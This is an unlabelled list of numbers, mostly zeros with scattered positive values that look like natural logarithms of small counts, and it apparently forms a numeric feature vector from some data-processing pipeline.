0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.545177444479562, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4339872044851467, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0, 0.0, 2.0794415416798357, 4.852030263919617, 0, 0, 0, 0.0, 0.0, 3.0841946160253872, 0, 0.0, 0, 2.8398715690385097, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.182806904693496, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.991464547107983, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.6109179126442243, 1.6094379124341003, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.248495242049359, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 4.292158018817389, 0, 0.0, 1.791759469228055, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 3.4657359027997265, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7369991058576035, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9120230054281455, 5.46286043483228, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4657359027997265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.969813299576001, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 6.198469360840315, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 9.036526890435972, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 10.645964802870076, 0, 3.0910424533583156, 0, 4.394449154672439, 0, 0.0, 5.16396083649347, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.983606621708336, 5.723585101952381, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 6.731743096669168, 0.0, 0.0, 0.0, 4.248495242049359, 2.302585092994046, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.484135188312967, 0.0, 0.0, 4.581130849408909, 0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0, 0.0, 7.3777589082278725, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 4.828313737302301, 0.0, 0, 3.8918202981106265, 0, 0, 0.0, 0.0, 0.0, 3.6375861597263857, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.6913478822291435, 0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 2.70805020110221, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0, 0.0, 0, 0.0, 4.748123315783209, 0.0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 5.375278407684164, 0.0, 0, 0.0, 0.0, 0.0, 3.649511027115099, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4657359027997265, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.9512437185814275, 0.0, 0, 3.178053830347946, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0, 5.262690188904886, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.8903717578961645, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9957322735539913, 0, 0.0, 0.0, 0.0, 2.3978952727983707, 4.182806904693496, 0.0, 0.0, 5.541833368412345, 0, 0.0, 0.0, 0.0, 4.0943445622221, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0.0, 0.0, 7.652696215340967, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.784189633918261, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 4.581130849408909, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0, 0, 2.302585092994046, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 4.06534854782536, 0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 1.9459101490553132, 0, 0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 4.394449154672439, 0.0, 0.0, 0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0, 4.160336650881089, 0.0, 0.0, 0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 18.10738653744207, 0.0, 0.0, 0.0, 0.0, 15.33168766477724, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 7.783640596221253, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.49964003216865, 5.723585101952381, 16.710753060660316, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.1354942159291497, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.429345628954441, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.1298987149230735, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 5.030437921392435, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 1.791759469228055, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 6.515580919909374, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 5.95562797505323, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.631631038266565, 0, 3.1354942159291497, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.390770307485499, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 